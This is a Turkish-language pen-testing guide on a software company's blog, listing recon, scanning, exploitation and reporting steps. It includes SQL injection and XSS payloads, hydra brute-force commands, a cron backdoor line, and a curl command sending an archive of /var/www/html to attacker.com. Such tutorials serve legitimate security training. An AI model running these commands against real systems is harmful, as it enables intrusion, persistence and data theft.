Cesa Yazılım
TR EN DE

AMP • TR

Penetration Testing Rehberi 2025: Güvenlik Açığı Tespiti

Penetration testing (sızma testi) nasıl yapılır? Web, network ve API güvenlik testleri, pen test araçları ve metodolojileri.

Ana sürüm (canonical)

Penetration Testing Rehberi 2025

Penetration testing (sızma testi), sistem güvenliğini saldırganın gözünden test etme sanatı. Bu kapsamlı rehberde, profesyonel pen testing metodolojilerini ve araçlarını öğreneceksiniz.

Penetration Testing Nedir?

Penetration Testing (Pen Test):
Sistemlerdeki güvenlik açıklarını tespit etmek için gerçek saldırı senaryolarının simüle edilmesi.

Amaçlar:

Pen Test Türleri

1. Black Box Testing

2. White Box Testing

3. Gray Box Testing

Pen Test Metodolojisi

Faz 1: Reconnaissance (Keşif)

# Passive reconnaissance
# Whois lookup
whois target.com

# DNS enumeration
dig target.com ANY
nslookup target.com

# Google dorking
site:target.com filetype:pdf
site:target.com inurl:admin

# Shodan search
shodan search "target.com"

# Active reconnaissance
# Port scanning
nmap -sS -sV -O -p- target.com

# Service enumeration
nmap -sC -sV -p 80,443 target.com

# Subdomain enumeration
sublist3r -d target.com
amass enum -d target.com

Faz 2: Scanning & Enumeration

# Vulnerability scanning
nmap --script vuln target.com

# Web app scanning
nikto -h https://target.com

# SSL/TLS testing
sslscan target.com
testssl.sh target.com

# Directory bruteforcing
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Technology fingerprinting
whatweb target.com
wappalyzer

Faz 3: Exploitation

Web Application Attacks:

# SQL Injection
payload = "' OR '1'='1' --"
url = f"https://target.com/login?user={payload}"

# XSS (Cross-Site Scripting)
xss_payload = "<script>alert('XSS')</script>"

# Command Injection
cmd_payload = "; ls -la"

# File Upload Exploit
# Bypass filters
shell.php.jpg
shell.pHp
shell.php%00.jpg

Network Attacks:

# SMB exploitation
enum4linux target.com

# SSH brute force
hydra -l admin -P passwords.txt ssh://target.com

# RDP brute force
hydra -l administrator -P passwords.txt rdp://target.com

Faz 4: Post-Exploitation

# Privilege escalation
sudo -l
find / -perm -4000 -type f 2>/dev/null

# Persistence
echo "* * * * * /tmp/backdoor.sh" | crontab -

# Data exfiltration
tar -czf data.tar.gz /var/www/html
curl -F "file=@data.tar.gz" https://attacker.com/upload

# Lateral movement
ssh-keygen -t rsa
ssh-copy-id user@another-host

Faz 5: Reporting

Rapor İçeriği:

  1. Executive Summary
  2. Methodology
  3. Findings
    • Critical
    • High
    • Medium
    • Low
  4. Detailed Findings
  5. Remediation Recommendations
  6. Appendices

Essential Pen Test Tools

1. Reconnaissance

2. Web Application

3. Exploitation

4. Wireless

5. Password Cracking

OWASP Top 10 Testing

1. Broken Access Control

// Test authorization bypass
// Normal user trying admin endpoint
GET /admin/users HTTP/1.1
Cookie: session=user_token

// IDOR (Insecure Direct Object Reference)
GET /api/user/123/profile  // My profile
GET /api/user/124/profile  // Can I access others?

2. Cryptographic Failures

# Test SSL/TLS
testssl.sh --vulnerable target.com

# Check for weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com

3. Injection

-- SQL Injection tests
' OR '1'='1
admin' --
' UNION SELECT NULL,NULL,NULL--
' AND 1=0 UNION ALL SELECT 'admin','password'--

4. Insecure Design

5. Security Misconfiguration

# Default credentials
admin:admin
admin:password
root:toor

# Directory listing
https://target.com/.git/
https://target.com/backup/

# Debug mode
https://target.com/?debug=true

API Penetration Testing

# API enumeration
curl -X OPTIONS https://api.target.com/

# Authentication bypass
curl -H "Authorization: Bearer invalid_token" https://api.target.com/admin

# Rate limit testing
for i in {1..1000}; do
  curl https://api.target.com/api/endpoint &
done

# Mass assignment
curl -X POST https://api.target.com/api/users \
  -d '{"username":"test","role":"admin"}'

Mobile App Testing

# Android APK analysis
apktool d app.apk
jadx app.apk

# iOS IPA analysis
class-dump -H App.app/App

# Traffic interception
# Configure proxy (Burp/Charles)
# Install CA certificate
# Intercept HTTPS traffic

# Reverse engineering
# Frida for runtime manipulation
frida -U -f com.app.package

Report Template

# Penetration Test Report

## Executive Summary
- Test dates: DD/MM/YYYY
- Scope: target.com
- Findings: X critical, Y high, Z medium

## Risk Rating
Critical: 3
High: 5
Medium: 8
Low: 12

## Key Findings

### 1. SQL Injection (CRITICAL)
**Description:** SQL injection vulnerability in login form
**Impact:** Full database access, data breach
**Evidence:**
- URL: https://target.com/login.php
- Payload: ' OR '1'='1' --
- Screenshot: [attached]

**Recommendation:**
- Use prepared statements
- Input validation
- WAF implementation

### 2. XSS (HIGH)
...

## Conclusion
...

Best Practices

Etik:

Teknik:

Raporlama:

Yasal Uyarı

⚠️ ÖNEMLİ:
Penetration testing sadece yetkilendirilmiş sistemlerde yapılmalıdır. İzinsiz pen test suçtur ve ciddi yasal sonuçları vardır.

Gerekli Dokümantasyon:

Sonuç

Penetration testing sürekli bir süreç:

  1. Test et
  2. Rapor et
  3. Düzelt
  4. Tekrarla

Pen Test Frequency:

Profesyonel penetration testing hizmeti için bize ulaşın! 🔐

📧 iletisim@cesayazilim.com
📞 +90 850 225 53 34